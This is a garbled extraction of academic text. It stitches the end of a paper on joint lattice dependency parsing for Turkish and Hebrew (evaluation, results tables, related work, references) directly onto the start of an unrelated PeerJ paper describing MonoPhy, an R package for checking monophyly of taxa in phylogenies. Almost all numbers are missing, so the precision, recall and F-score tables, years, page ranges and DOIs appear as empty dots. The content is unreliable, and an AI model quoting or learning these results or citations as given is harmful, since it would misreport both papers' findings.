(seddah et al., ; zhang et al., ). the reason is that it is not an inher- ently dependency-based framework and the con- version from constituency structures to dependency structures interferes with the metric. the metric the method does not create cross, many-to-one, or one-to- many alignments, which can be important because in very rare cases the same token occurs twice in one word. the metric would not work for turkish, as the surface forms of non-final igs are all represented as underscores. as an experiment, we took a turkish treebank tree and cre- ated artificial parses by attaching one token to a different head each time. all other tokens remained attached to their correct head, and segmentation is kept gold. 
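returning to the token-based metric defined above, the following sketch (our own illustration, not the authors' evaluation script) aligns the tokens of corresponding words with a needleman-wunsch-style dynamic program in which mismatches are forbidden, so a predicted token either pairs with an identical gold token or with a gap; precision, recall, and f-score are then computed over matched tokens whose heads (and labels) also match.

    def align_without_mismatches(pred, gold):
        """align two token sequences allowing only exact matches and gaps.

        returns index pairs (i, j) with pred[i] == gold[j]; unmatched tokens are
        implicitly aligned to gaps. equality here stands in for "same surface form
        and same morphological analysis".
        """
        n, m = len(pred), len(gold)
        # best[i][j] = maximal number of matched pairs between pred[:i] and gold[:j]
        best = [[0] * (m + 1) for _ in range(n + 1)]
        for i in range(1, n + 1):
            for j in range(1, m + 1):
                match = best[i - 1][j - 1] + 1 if pred[i - 1] == gold[j - 1] else -1
                best[i][j] = max(best[i - 1][j], best[i][j - 1], match)
        pairs, i, j = [], n, m
        while i > 0 and j > 0:
            if pred[i - 1] == gold[j - 1] and best[i][j] == best[i - 1][j - 1] + 1:
                pairs.append((i - 1, j - 1))
                i, j = i - 1, j - 1
            elif best[i][j] == best[i - 1][j]:
                i -= 1
            else:
                j -= 1
        return pairs[::-1]

    def precision_recall_f1(true_positives, n_predicted, n_gold):
        precision = true_positives / n_predicted if n_predicted else 0.0
        recall = true_positives / n_gold if n_gold else 0.0
        if precision + recall == 0.0:
            return precision, recall, 0.0
        return precision, recall, 2 * precision * recall / (precision + recall)
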
this gave us parses that contained exactly one attachment error and one parse iden- tical with the gold standard. running tedeval on each of the proposed in goldberg ( ) implements the same ideas without edit distance and is defined directly for dependencies. segmentation evaluation. we use the same token-based precision and recall to measure the quality of segmentation and morphological analysis without syntax. for a token to be correct, it has to have the same morphological analysis as the token in the gold standard to which it is aligned. we fur- thermore report word accuracy (accw), which is the percentage of words that received the correct seg- mentation. results segmentation and morphology. table shows the quality of segmentation and morphological anal- ysis. the baseline for turkish is the turkish morphological disambiguator by sak et al. ( ), trained on the turkish treebank. for hebrew, the baseline is the disambiguated lattices provided by the spmrl shared task. the bigram model is our own morphological disambiguator. the joint model is the full lattice parser, which has access to syntactic information. the results show that the bigram model is clearly outperforming the baselines for both languages. the feature model of the bigram model was developed on the turkish development set, but the model also works well for hebrew. comparing the bigram model to the joint model shows that overall, the joint model performs better than the bigram model. how- ever, the joint model mainly scores in recall rather than in precision, the bigram model is even ahead of the joint model in precision for hebrew. the joint model outperforms the bigram model and the base- line also in word accuracy. the results demonstrate that syntactic information is relevant to resolve am- biguity in segmentation and morphology for turkish and hebrew. incorrect parses gave us different scores. the differences are caused by the transformation of dependency trees to con- stituency trees, because the constituency trees have different edit distances compared to the gold standard. consequently, this means that some attachment errors of the dependency parser are punished more than others in an unpredictable way. a description on how these lattice are produced is given in seddah et al. ( , page ) turkish hebrew data system prec rec f accw prec rec f accw dev baseline . . . . . . . . bigram model . . . . . . . . joint model . . . . . . . . test baseline . . . . . . . . bigram model . . . . . . . . joint model . . . . . . . . table : path selection quality. labeled unlabeled igeval strict igeval data system prec rec f prec rec f uasig lasig uasig lasig dev mate . . . . . . . . . . turbo . . . . . . . . . . pipeline . . . . . . . . . . joint . . ∗ . . . ∗ . . ∗ . . . cv mate . . . . . . . . . . turbo . . . . . . . . . . pipeline . . . . . . . . . . joint . . † . . ∗ . † . . . . . test mate . . . . . . . . . . turbo . . . . . . . . . . pipeline . . . . . . . . . . joint . . ∗ . . ∗ . ∗ . . . . . table : parsing results for turkish. statistically significant differences between the joint system and the pipeline system are marked with † (p < . ) and ∗ (p < . ). significance testing was performed using the wilcoxon signed rank test (not for f ). turkish. table presents the results of the eval- uation of the three baseline systems and the lattice parser on the turkish data. the pipeline and the joint system give better results than the other two baselines across the board. 
this shows that the fea- ture set of the lattice parser is better suited to the turkish treebank than the feature set of mate parser and turbo parser. it is not a surprising result though, since the lattice parser was developed for turkish whereas the other two parsers were developed for other treebanks. the joint system outperforms the pipeline sys- tem with respect to the first three metrics. these metrics evaluate syntax, segmentation, and morpho- logical analysis jointly. higher scores here mean that these aspects in combination have become bet- ter. the differences between the pipeline and the joint model are consistently statistically significant with respect to recall, but only in some cases with re- spect to precision. the syntactic information that is available to the joint model thus seems to improve recall rather than precision. the last two columns in table show an evalu- ation using igeval. the igeval metric is designed to evaluate the syntactic quality with less attention to morphological analysis and segmentation. here, both pipeline and joint achieve very similar re- sults and none of the differences is statistical signif- icant. these results suggest that a good part of the improvements in the lattice parser occurs in the mor- phological analysis/segmentation, whereas the qual- ity of syntactic annotation basically stays the same between the pipeline and the joint model. hebrew. the experimental results on the hebrew data are shown in table . the three baselines per- form very similarly. all three baseline systems are run on the output of the same disambiguator, which means that the feature models of the parsers seem to be equally well suited to the hebrew treebank. the feature model of the lattice parser that is used in the pipeline baseline was not adapted to hebrew in any way, but was used as it was developed for the turk- ish data. compared to the three baselines, the joint model outperforms them for both labeled and unlabeled scores. as the only difference between pipeline and joint is the fact that the latter performs joint decoding, the results support the findings in con- stituency parsing by tsarfaty ( ), cohen and smith ( ), and goldberg and tsarfaty ( ), namely that joint decoding is a better model for he- brew parsing. judging from statistical significance, the joint model improves recall rather than preci- sion, a picture that we found for turkish as well. labeled unlabeled data system prec rec f prec rec f dev mate . . . . . . turbo . . . . . . pipeline . . . . . . joint . . † . . . ∗ . test mate . . . . . . turbo . . . . . . pipeline . . . . . . joint . . † . . . † . table : statistically significant differences between the joint system and the pipeline system are marked with † (p < . ) and ∗ (p < . ). significance testing was performed using the wilcoxon signed rank test (not for f ). as described in section . , we cannot evaluate the syntax entirely independently on hebrew, but we can eliminate the morphological level. table shows the results of the evaluation when only syn- tax and surface forms are matched. the overall pic- ture compared to the evaluation shown in table does not change, however. also when disregarding the quality of morphology, the joint model outper- forms the pipeline, notably with respect to recall. related work graph-based parsing. our basic architecture re- sembles the joint constituency parsing and pos tag- ging model by rush et al. ( ), but our model labeled unlabeled data system prec rec f prec rec f dev mate . . . . . . turbo . 
. . . . . pipeline . . . . . . joint . . † . . . † . test mate . . . . . . turbo . . . . . . pipeline . . . . . . joint . . † . . . † . table : parsing results for hebrew, evaluated without morphology. statistically significant differences between the joint system and the pipeline system are marked with †. significance testing was performed using the wilcoxon signed rank test with p < . (not for f ). needs additional constraints to enforce agreement between the two tasks. martins et al. ( a) and martins et al. ( ) show how such first-order logic constraints can be represented as subproblems in dual decomposition. similar approaches, where such constraints are used to ensure certain proper- ties in the output structures, have been used e.g. in semantic parsing (das et al., ), compressive summarization (almeida and martins, ), and joint quotation attribution and coreference resolu- tion (almeida et al., ). parsers that use dual de- composition are proposed in koo et al. ( ) and martins et al. ( ). from koo et al. ( ), we adopted the idea of using the chu-liu-edmonds al- gorithm to ensure tree properties in the output as well as second-order parsing with head automata. li et al. ( ) extend several higher-order vari- ants of the eisner decoder (eisner, ) such that pos tags are predicted jointly with syntax. the complexity of their joint models increases by poly- nomials of the tag set size. due to the dual decompo- sition approach, the complexity of our parser stays equal to the complexity of the most complex sub- problem, which is the second-order head automata in our case. transition-based parsing. joint models in transition-based parsing usually introduce a variant of the shift transition that performs the additional task, e.g. it additionally predicts the pos tag and possibly morphological features of a token that is being shifted (hatori et al., ; bohnet and nivre, ; bohnet et al., ). optimization over the joint model is achieved by beam search. to also solve the word segmentation task, several models for chinese were proposed that parse on the level of single characters, forming words from characters with a special append transition (hatori et al., ; li and zhou, ) or predicting word internal structure along with syntax (zhang et al., ). to use such a transition-based system for the segmen- tation task in turkish or hebrew, the shift transition would have to be changed to do the opposite of the append transition in the chinese parsers: segment an incoming token into several ones, for example based on the output of a morphological analyzer. easy-first parsing. ma et al. ( ) introduce a variant of the easy-first parser (goldberg and el- hadad, a) that uses an additional operation to pos tag input tokens. the operations are ordered such that the parser can only introduce a dependency arc between two tokens that have received a pos tag already. tratz ( ) presents a similar system for arabic that defines several more operations to deal with segmentation ambiguity. sampling-based parsing. zhang et al. ( ) present a joint model that relies on sampling and greedy hill-climbing for decoding, but allows for ar- bitrarily complex scoring functions thus opening ac- cess to global and cross-level features. such fea- tures could be simulated in our model by adding ad- ditional factors in the form of soft constraints (con- straints with output, see martins et al. ( )), but this would introduce a considerable number of addi- tional factors with a notable impact on performance. constituency parsing. 
joint models have also been investigated in constituency parsing, notably for hebrew. tsarfaty ( ) already discusses full joint models, but the first full parsers were presented in cohen and smith ( ), goldberg and tsar- faty ( ), and later goldberg and elhadad ( ). green and manning ( ) present a similar parser for arabic. among these, some authors emphasize the importance of including scores from the mor- phological model into the parsing model, whereas other models do not use them at all. in our parser, the model is trained jointly for both tasks without weighting the two tasks differently. parsing hebrew and turkish. joint models for hebrew parsing were mostly investigated for con- stituency parsing (see above). there has been some work specifically on hebrew dependency parsing (goldberg and elhadad, ; goldberg and el- hadad, b; goldberg, ), but not in the con- text of joint models. turkish dependency parsing was pioneered in eryiğit and oflazer ( ) and eryiğit et al. ( ). they compare parsing based on inflectional groups to word-based parsing and conclude that the former is more suitable for turkish. çetinoğlu and kuhn ( ) are first to discuss joint models for turkish and present experiments for joint pos tagging and parsing, but use a pipeline to decide on segmenta- tion and morphological features. to the best of our knowledge, there currently exists no work on full lat- tice parsing for turkish. conclusion morphologically rich languages pose many chal- lenges to standard dependency parsing systems, one of them being that the number of tokens in the output is not always known beforehand. solving this prob- lem in a pipeline setup leads to efficient systems but systematically excludes interaction between the lex- ical, morphological, and syntactic level of analysis. in this work, we have presented a graph-based lattice dependency parser that operates on morpho- logical lattices and simultaneously predicts a de- pendency tree and a path through the lattice. we tested the joint model on the turkish treebank and the treebank of modern hebrew and demonstrated that the joint model outperforms three state-of-the- art pipeline models. we presented the first results for full lattice parsing on the turkish treebank. the results on the hebrew treebank corroborate findings in constituency parsing (cohen and smith, ; goldberg and tsarfaty, ). acknowledgments we thank our anonymous reviewers for their help- ful comments. we also thank anders björkelund for many useful discussions. this work was funded by the deutsche forschungsgemeinschaft (dfg) via sfb , projects d and d . references miguel almeida and andre martins. . fast and robust compressive summarization with dual de- composition and multi-task learning. in proceed- ings of the st annual meeting of the association for computational linguistics (volume : long papers), pages – , sofia, bulgaria, august. association for computational linguistics. mariana s. c. almeida, miguel b. almeida, and andré f. t. martins. . a joint model for quotation at- tribution and coreference resolution. in proceedings of the th conference of the european chapter of the association for computational linguistics, pages – , gothenburg, sweden, april. association for com- putational linguistics. bernd bohnet and joakim nivre. . a transition- based system for joint part-of-speech tagging and labeled non-projective dependency parsing. 
in pro- ceedings of the joint conference on empirical methods in natural language processing and com- putational natural language learning, pages – , jeju, south korea. association for computa- tional linguistics. bernd bohnet, joakim nivre, igor boguslavsky, richrd farkas, filip ginter, and jan haji. . joint mor- phological and syntactic analysis for richly inflected languages. transactions of the association for com- putational linguistics, : – . bernd bohnet. . efficient parsing of syntactic and semantic dependency structures. in proceedings of the thirteenth conference on computational natu- ral language learning (conll ): shared task, pages – , boulder, colorado, june. association for computational linguistics. bernd bohnet. . very high accuracy and fast depen- dency parsing is not a contradiction. in proceedings of the rd international conference on computational linguistics, pages – , beijing, china. international committee on computational linguistics. xavier carreras. . experiments with a higher- order projective dependency parser. in proceedings of the conll shared task session of emnlp-conll , pages – , prague, czech republic, june. association for computational linguistics. özlem çetinoğlu and jonas kuhn. . towards joint morphological analysis and dependency pars- ing of turkish. in proceedings of the second in- ternational conference on dependency linguistics (depling ), pages – , prague, czech repub- lic, august. charles university in prague, matfyz- press, prague, czech republic. özlem çetinoğlu. . turkish treebank as a gold standard for morphological disambiguation and its influence on parsing. in nicoletta calzolari (confer- ence chair), khalid choukri, thierry declerck, hrafn loftsson, bente maegaard, joseph mariani, asun- cion moreno, jan odijk, and stelios piperidis, editors, proceedings of the ninth international conference on language resources and evaluation (lrec’ ), reykjavik, iceland, may. european language re- sources association (elra). yoeng-jin chu and tseng-hong liu. . on the shortest arborescence of a directed graph. scientia sinica, ( ): – . shay b. cohen and noah a. smith. . joint morpho- logical and syntactic disambiguation. in proceedings of the joint conference on empirical methods in natural language processing and computational natural language learning, pages – , prague, czech republic. association for computational lin- guistics. koby crammer, ofer dekel, shai shalev-shwartz, and yoram singer. . online passive-aggressive algo- rithms. in proceedings of the th annual conference on neural information processing systems, volume , pages – , cambridge, massachusetts, usa. mit press. dipanjan das, andré f. t. martins, and noah a. smith. . an exact dual decomposition algorithm for shallow semantic parsing with constraints. in *sem : the first joint conference on lexical and com- putational semantics – volume : proceedings of the main conference and the shared task, and volume : proceedings of the sixth international workshop on semantic evaluation (semeval ), pages – , montréal, canada, - june. association for compu- tational linguistics. jack edmonds. . optimum branchings. jour- nal of research of the national bureau of standards, b( ): – . jason eisner. . bilexical grammars and a cubic- time probabilistic parser. in proceedings of the th international workshop on parsing technologies (iwpt), pages – , mit, cambridge, ma, sep. gülşen eryiğit and kemal oflazer. . statistical de- pendency parsing of turkish. 
in proceedings of the th conference of the european chapter of the as- sociation for computational linguistics, pages – , trento, italy. association for computational linguis- tics. gülşen eryiğit, joakim nivre, and kemal oflazer. . dependency parsing of turkish. computational lin- guistics, ( ): – . gülşen eryiğit, tugay ilbay, and ozan arkan can. . multiword expressions in statistical depen- dency parsing. in proc. of the spmrl workshop of iwpt, pages – , dublin, ireland. gülşen eryiğit. . the impact of automatic morpho- logical analysis & disambiguation on dependency parsing of turkish. in nicoletta calzolari, khalid choukri, thierry declerck, mehmet uğur doğan, bente maegaard, joseph mariani, jan odijk, and ste- lios piperidis, editors, proceedings of the eighth in- ternational conference on language resources and evaluation (lrec- ), pages – , istanbul, turkey, may. european language resources associa- tion (elra). acl anthology identifier: l - . yoav freund and robert e. schapire. . large mar- gin classification using the perceptron algorithm. ma- chine learning, ( ): – . yoav goldberg and michael elhadad. . hebrew dependency parsing: initial results. in proceedings of the th international conference on parsing tech- nologies (iwpt’ ), pages – , paris, france, october. association for computational linguistics. yoav goldberg and michael elhadad. a. an ef- ficient algorithm for easy-first non-directional de- pendency parsing. in human language technologies: the annual conference of the north american chapter of the association for computational linguis- tics, pages – , los angeles, california, june. association for computational linguistics. yoav goldberg and michael elhadad. b. easy-first dependency parsing of modern hebrew. in proceed- ings of the naacl hlt first workshop on sta- tistical parsing of morphologically-rich languages, pages – , los angeles, ca, usa, june. associ- ation for computational linguistics. yoav goldberg and michael elhadad. . word seg- mentation, unknown-word resolution, and morpholog- ical agreement in a hebrew parsing system. computa- tional linguistics, ( ): – . yoav goldberg and reut tsarfaty. . a single gener- ative model for joint morphological segmentation and syntactic parsing. in proceedings of the th annual meeting of the association for computational linguis- tics, pages – , columbus, ohio. association for computational linguistics. yoav goldberg. . automatic syntactic processing of modern hebrew. ph.d. thesis, ben gurion university, beer sheva, israel. spence green and christopher d. manning. . bet- ter arabic parsing: baselines, evaluations, and anal- ysis. in proceedings of the rd international con- ference on computational linguistics (coling ), pages – , beijing, china, august. coling organizing committee. jun hatori, takuya matsuzaki, yusuke miyao, and jun’ichi tsujii. . incremental joint pos tag- ging and dependency parsing in chinese. in proceed- ings of th international joint conference on natu- ral language processing, pages – , chiang mai, thailand, november. asian federation of natu- ral language processing. jun hatori, takuya matsuzaki, yusuke miyao, and jun’ichi tsujii. . incremental joint approach to word segmentation, pos tagging, and dependency parsing in chinese. in proceedings of the th an- nual meeting of the association for computational linguistics (volume : long papers), pages – , jeju island, korea, july. association for com- putational linguistics. terry koo, alexander m. 
rush, michael collins, tommi jaakkola, and david sontag. . dual decomposi- tion for parsing with non-projective head automata. in proceedings of the conference on empiri- cal methods in natural language processing, pages – , cambridge, ma, october. association for computational linguistics. zhongguo li and guodong zhou. . unified depen- dency parsing of chinese morphological and syntactic structures. in proceedings of the joint confer- ence on empirical methods in natural language pro- cessing and computational natural language learn- ing, pages – , jeju island, korea, july. asso- ciation for computational linguistics. zhenghua li, min zhang, wanxiang che, ting liu, wen- liang chen, and haizhou li. . joint models for chinese pos tagging and dependency parsing. in proceedings of the conference on empiri- cal methods in natural language processing, pages – , edinburgh, scotland, uk, july. associa- tion for computational linguistics. ji ma, tong xiao, jingbo zhu, and feiliang ren. . easy-first chinese pos tagging and dependency parsing. in proceedings of coling , pages – , mumbai, india, december. the coling organizing committee. andre martins, noah smith, and eric xing. . con- cise integer linear programming formulations for de- pendency parsing. in proceedings of the joint con- ference of the th annual meeting of the acl and the th international joint conference on natural lan- guage processing of the afnlp, pages – , sun- tec, singapore, august. association for computational linguistics. andre martins, noah smith, eric xing, pedro aguiar, and mario figueiredo. . turbo parsers: depen- dency parsing by approximate variational inference. in proceedings of the conference on empirical methods in natural language processing, pages – , cambridge, ma, october. association for compu- tational linguistics. andre martins, mario figueiredo, pedro aguiar, noah smith, and eric xing. a. an augmented la- grangian approach to constrained map inference. in lise getoor and tobias scheffer, editors, proceed- ings of the th international conference on machine learning (icml- ), icml ’ , pages – , new york, ny, usa, june. acm. andre martins, noah smith, mario figueiredo, and pe- dro aguiar. b. dual decomposition with many overlapping components. in proceedings of the conference on empirical methods in natural lan- guage processing, pages – , edinburgh, scot- land, uk., july. association for computational lin- guistics. andre martins, miguel almeida, and noah a. smith. . turning on the turbo: fast third-order non- projective turbo parsers. in proceedings of the st annual meeting of the association for computational linguistics (volume : short papers), pages – , sofia, bulgaria, august. association for computa- tional linguistics. andré f. t. martins, mário a. t. figueiredo, pedro m. q. aguiar, noah a. smith, and eric p. xing. . ad : alternating directions dual decomposition for map inference in graphical models. journal of machine learning research, : – . ryan mcdonald and fernando pereira. . on- line learning of approximate dependency parsing al- gorithms. in proceedings of the th conference of the european chapter of the association for compu- tational linguistics, pages – , trento, italy. asso- ciation for computational linguistics. ryan mcdonald, fernando pereira, kiril ribarov, and jan hajic. . non-projective dependency parsing using spanning tree algorithms. 
in proceedings of human language technology conference and confer- ence on empirical methods in natural language pro- cessing, pages – , vancouver, british columbia, canada, october. association for computational lin- guistics. saul b. needleman and christian d. wunsch. . a general method applicable to the search for similarities in the amino acid sequence of two proteins. journal of molecular biology, ( ): – . kemal oflazer, bilge say, dilek zeynep hakkani-tür, and gökhan tür. . building a turkish tree- bank. in anne abeille, editor, building and exploiting syntactically-annotated corpora. kluwer academic publishers, dordrecht. kemal oflazer. . two-level description of turk- ish morphology. literary and linguistic computing, ( ): – . alexander m. rush, david sontag, michael collins, and tommi jaakkola. . on dual decomposition and linear programming relaxations for natural lan- guage processing. in proceedings of the confer- ence on empirical methods in natural language pro- cessing, pages – , cambridge, ma, october. asso- ciation for computational linguistics. haşim sak, tunga güngör, and murat saraçlar. . turkish language resources: morphological parser, morphological disambiguator and web corpus. in proc. of gotal , pages – . djamé seddah, reut tsarfaty, sandra kübler, marie can- dito, jinho d. choi, richárd farkas, jennifer fos- ter, iakes goenaga, koldo gojenola galletebeitia, yoav goldberg, spence green, nizar habash, marco kuhlmann, wolfgang maier, joakim nivre, adam przepiórkowski, ryan roth, wolfgang seeker, yan- nick versley, veronika vincze, marcin woliński, alina wróblewska, and eric villemonte de la clergerie. . overview of the spmrl shared task: a cross-framework evaluation of parsing morphologi- cally rich languages. in proceedings of the fourth workshop on statistical parsing of morphologically- rich languages, pages – , seattle, washington, usa, october. association for computational lin- guistics. djamé seddah, sandra kübler, and reut tsarfaty. . introducing the spmrl shared task on parsing morphologically-rich languages. in proceedings of the first joint workshop on statistical parsing of mor- phologically rich languages and syntactic analysis of non-canonical languages, pages – , dublin, ireland, august. dublin city university. khalil sima’an, alon itai, yoad winter, alon altman, and noa nativ. . building a tree-bank of modern hebrew text. traitement automatique des langues, ( ): – . ben taskar, vassil chatalbashev, daphne koller, and carlos guestrin. . learning structured predic- tion models: a large margin approach. in proceed- ings of the th annual international conference on machine learning, pages – , bonn, germany. acm. stephen tratz. . a cross-task flexible transi- tion model for arabic tokenization, affix detection, affix labeling, pos tagging, and dependency pars- ing. in proceedings of the fourth workshop on sta- tistical parsing of morphologically-rich languages, pages – , seattle, washington, usa, october. as- sociation for computational linguistics. reut tsarfaty, djamé seddah, yoav goldberg, sandra kuebler, yannick versley, marie candito, jennifer foster, ines rehbein, and lamia tounsi. . sta- tistical parsing of morphologically rich languages (spmrl) what, how and whither. in proceedings of the naacl hlt first workshop on statistical parsing of morphologically-rich languages, pages – , los angeles, ca, usa, june. association for computational linguistics. reut tsarfaty, joakim nivre, and evelina andersson. . 
joint evaluation of morphological segmen- tation and syntactic parsing. in proceedings of the th annual meeting of the association for compu- tational linguistics (volume : short papers), pages – , jeju island, korea, july. association for com- putational linguistics. reut tsarfaty. . integrated morphological and syn- tactic disambiguation for modern hebrew. in pro- ceedings of the coling/acl student research workshop, pages – , sydney, australia, july. as- sociation for computational linguistics. meishan zhang, yue zhang, wanxiang che, and ting liu. . character-level chinese dependency parsing. in proceedings of the nd annual meeting of the association for computational linguistics (vol- ume : long papers), pages – , baltimore, maryland, june. association for computational lin- guistics. yuan zhang, chengtao li, regina barzilay, and kareem darwish. . randomized greedy inference for joint segmentation, pos tagging and dependency parsing. in proceedings of the conference of the north american chapter of the association for computational linguistics: human language tech- nologies, pages – , denver, colorado, may–june. association for computational linguistics. submitted december accepted march published march corresponding author orlando schwery, oschwery@vols.utk.edu academic editor mihai pop additional information and declarations can be found on page doi . /peerj-cs. copyright schwery and o’meara distributed under creative commons cc-by . open access monophy: a simple r package to find and visualize monophyly issues orlando schwery and brian c. o’meara department of ecology and evolutionary biology, university of tennessee, knoxville, tn, usa abstract background. the monophyly of taxa is an important attribute of a phylogenetic tree. a lack of it may hint at shortcomings of either the tree or the current taxonomy, or can indicate cases of incomplete lineage sorting or horizontal gene transfer. whichever is the reason, a lack of monophyly can misguide subsequent analyses. while monophyly is conceptually simple, it is manually tedious and time consuming to assess on modern phylogenies of hundreds to thousands of species. results. the r package monophy allows assessment and exploration of monophyly of taxa in a phylogeny. it can assess the monophyly of genera using the phylogeny only, and with an additional input file any other desired higher order taxa or unranked groups can be checked as well. conclusion. summary tables, easily subsettable results and several visualization options allow quick and convenient exploration of monophyly issues, thus making monophy a valuable tool for any researcher working with phylogenies. subjects bioinformatics, computational biology keywords phylogeny, evolution, monophyly, r package, taxonomy, rogue taxa, tree conflict, horizontal gene transfer, incomplete lineage sorting introduction phylogenetic trees are undoubtedly crucial for most research in ecology or evolutionary biology. whether one is studying trait evolution (e.g., coddington, ; donoghue, ), diversification (e.g., gilinsky & good, ; hey, ), phylogeography (avise et al., ), or simply relatedness within a group (e.g., czelusniak et al., ; shochat & dessauer, ; sibley & ahlquist, ), bifurcating trees representing hierarchically nested relationships are central to the analysis. exactly because phylogenies are so fundamental to the inferences we make, we need tools that enable us to examine how reconstructed relationships compare with existing assumptions, particularly taxonomy. 
we have computational approaches to estimate confidence for parts of a phylogeny (felsenstein, ; larget & simon, ) or to measure the distance between two phylogenies (robinson, ), but assessing the agreement of a new phylogeny with existing taxonomy is often done manually. this does not scale to modern phylogenies of hundreds to thousands of taxa. modern taxonomy seeks to name clades: an ancestor and all of its descendants (the descendants thus form a monophyletic group). discrepancies between the new phylogenetic hypothesis and the current taxonomic classification may indicate that the phylogeny is wrong or poorly resolved. alternatively, a well-supported phylogeny that conflicts with currently recognized groups might suggest that the taxonomy should be reformed. to identify such discrepancies, one can simply assess whether the established taxa are monophyletic.

a lack of group monophyly, however, can also be an indicator of conflict between gene trees and the species tree, which may be a result of incomplete lineage sorting or horizontal gene transfer. in any case, monophyly issues in a phylogeny suggest a potential error that can affect downstream analysis and inference. for example, they can mislead ancestral trait or area reconstruction, or introduce false signals when assigning unsampled diversity for diversification analyses (e.g., in diversitree (fitzjohn, ) or bamm (rabosky, )). in general, a lack of monophyly can blur patterns we might otherwise see in the data.

as this problem is by no means new, approaches to solve it have been developed earlier, particularly for large-scale sequencing projects in bacteria and archaea, for which taxonomic issues are notoriously challenging. the program grunt (dalevi et al., ) uses a tip-to-root walk approach to group, regroup, and name clades according to certain user-defined criteria. the subsequently developed 'taxonomy to tree' approach (mcdonald et al., ) matches existing taxonomic levels onto newly generated trees, allowing classification of unidentified sequences and proposal of changes to the taxonomic nomenclature based on tree topology. finally, matsen & gallagher ( ) have developed algorithms that find mismatches between taxonomy and phylogeny using a convex subcoloring approach.

the new tool presented here, the r package monophy, is a quick and user-friendly method for assessing the monophyly of taxa in a given phylogeny. while the r package ape (paradis, claude & strimmer, ) already contains the helpful function is.monophyletic, which also enables testing for monophyly, the functionality of monophy is much broader. apart from assessing monophyly for all groups and focal taxonomic levels in a tree at once, monophy is not limited to providing a simple 'yes-or-no' output, but rather enables the user to explore the underlying causes of non-monophyly. in the following, we outline the structure and usage of the package and provide examples to demonstrate its functionality.
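as a preview of the workflow detailed in the following sections, the sketch below shows how an analysis might be set up in r. the function names follow the package's command list given below; the input file names and the taxonomy argument are illustrative assumptions rather than a prescription.

```r
## a minimal sketch of the intended workflow; file names and argument names are assumptions
library(ape)      # read.tree()
library(MonoPhy)  # AssessMonophyly() and related functions

tree <- read.tree("my_phylogeny.tre")                # hypothetical input tree
taxa <- read.csv("my_taxonomy.csv")                  # optional table assigning tips to higher taxa

res_genus <- AssessMonophyly(tree)                   # genus-level check from 'genus_speciesepithet' tip labels
res_tribe <- AssessMonophyly(tree, taxonomy = taxa)  # check user-defined higher-order groups

GetSummaryMonophyly(res_genus)                       # summary table of monophyly status
GetIntruderTips(res_genus)                           # tips that disrupt the monophyly of other taxa
PlotMonophyly(res_genus, tree)                       # tree coloured by monophyly status
```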
for a more usage-focused and application-oriented treatment, one should refer to the tutorial vignette (vignette("monophyvignette")), which contains stepwise instructions for the different functions and their options. for any other package details, consult the documentation (help("monophy")).

description
the package monophy is written in r (r development core team, , http://www.r-project.org/), an increasingly important language for evolutionary biology. it builds on the existing packages ape (paradis, claude & strimmer, ), phytools (revell, ), phangorn (schliep, ), rcolorbrewer (neuwirth, ) and taxize (chamberlain & szocs, ). a list of the currently implemented commands is given in table . note that in the code and in this paper, we distinguish between tips, the organisms at the tips of the tree, and higher-order taxa. functions with 'taxa' in their name only return information about higher-order taxa, not tips.

table : functions of the package monophy.
- assessmonophyly: runs the main analysis to assess the monophyly of groups on a tree.
- getancnodes: returns mrca nodes for taxa.
- getintrudertaxa: returns lists of taxa that cause monophyly issues for another taxon.
- getintrudertips: returns lists of tips that cause monophyly issues for a taxon.
- getoutliertaxa: returns lists of taxa that have monophyly issues due to outliers.
- getoutliertips: returns lists of tips that cause monophyly issues for their taxon by being outliers.
- getresultmonophyly: returns an extended table of the results.
- getsummarymonophyly: returns a summary table of the results.
- plotmonophyly: allows several visualizations of the result.

the main function—assessmonophyly—evaluates the monophyly of each higher-order taxon by identifying the most recent common ancestor (mrca) of a collection of tips (e.g., all species in a genus), and then returning all descendants of this node. the taxon is monophyletic if the number of its members (tips) equals the number of descendants of its mrca. if there are more descendants than taxon members, the function will identify and list the tips that do not belong to the focal taxon; we call these tips 'intruders.' accordingly, we refer to the taxa whose monophyly is disrupted by these 'intruders' as 'intruded.' note that if two taxa reciprocally disrupt each other's monophyly, certain tips of intruded taxa will often be intruders themselves: if the phylogeny is ((a , b ), (a , b )), where a and b are genera, it is not clear whether the a tips are intruding in b or the b tips are intruding in a. biologically, identifying a few intruders may suggest that the definition of a group should be expanded; observing some group members in very different parts of the tree than the rest of their taxon may instead suggest that these individuals were misidentified, that their placement is the result of contaminated sequences, or that it is due to horizontal gene transfer between members of two remote clades. moreover, the approach as described above would suggest that the clades intruded by the outlier tips would in turn be intruders to the taxon the outliers belong to, which intuitively would not make sense. we thus implemented an option to specify a cutoff value, which defines the minimal proportion of tips among the descendants of a taxon's mrca that are labeled as being actual members of that taxon.
if a given group falls below this value, the function will find the ‘core clade’ (a subclade for which the proportion matches or exceeds the cutoff value) by moving tipward, always following the descendant node with the greater number of tips in the focal taxon (absolute, relative if tied), and at each step evaluating the subtree rooted at that node to see if it exceeds the cutoff value. once such a subtree is found, it is then called the ‘core clade’, and taxon members outside this clade are then called ‘outliers’. as there is no objective criterion to decide at what point individuals should be considered outliers, a reasonable cutoff value must be chosen by the user. if the tree’s tip labels are in the format ‘genus_speciesepithet’, the genus names will be extracted and used as taxon assignments for the tips. if the tip labels are in another format, or other taxonomic levels should be tested, taxon names can be assigned to the tips using an input file. to avoid having to manually compose a taxonomy file for a taxon-rich phylogeny, monophy can automatically download desired taxonomic levels from itis or ncbi using taxize (chamberlain & szocs, ). schwery and o’meara ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure monophyly plot of the genera of ericaceae. close-up on subfamily vaccinioideae only. branches of the tree coloured according to monophyly status. we can see that vaccinium has two outliers and that its intruders are paphia, dimorphanthera, agapetes and gaylussacia. all inference results are stored in a solution object, from which the other functions can extract information (e.g., summary tables, intruder and outlier lists) for one or more higher-level taxa of interest. plotmonophyly reconstructs and plots the monophyly state of the tips using phytools (revell, ). apart from the basic monophyly plot (fig. ), branches can be coloured according to taxonomic groups or to highlight intruders and outliers. monophyletic groups can be collapsed and plots can be saved directly to pdf to facilitate the visualization of large trees. it is important to remember that the results produced by the package are merely the product of the used phylogeny and the available taxonomic information. it thus only makes the mismatches between those accessible, but does not reveal any more than that. the decision of whether the result suggests problems in the phylogeny or the taxonomy, whether a tip should be considered a rogue taxon and be removed or whether gene tree-species tree conflicts should be investigated, is entirely up to the user’s judgment. monophy is available through cran (https://cran.r-project.org/package=monophy/) and is developed on github (https://github.com/oschwery/monophy). intended extensions and fixes can be seen in the issues list of the package’s github page. among the planned extensions of the package are: multiple trees, displaying the result for specific subtrees, 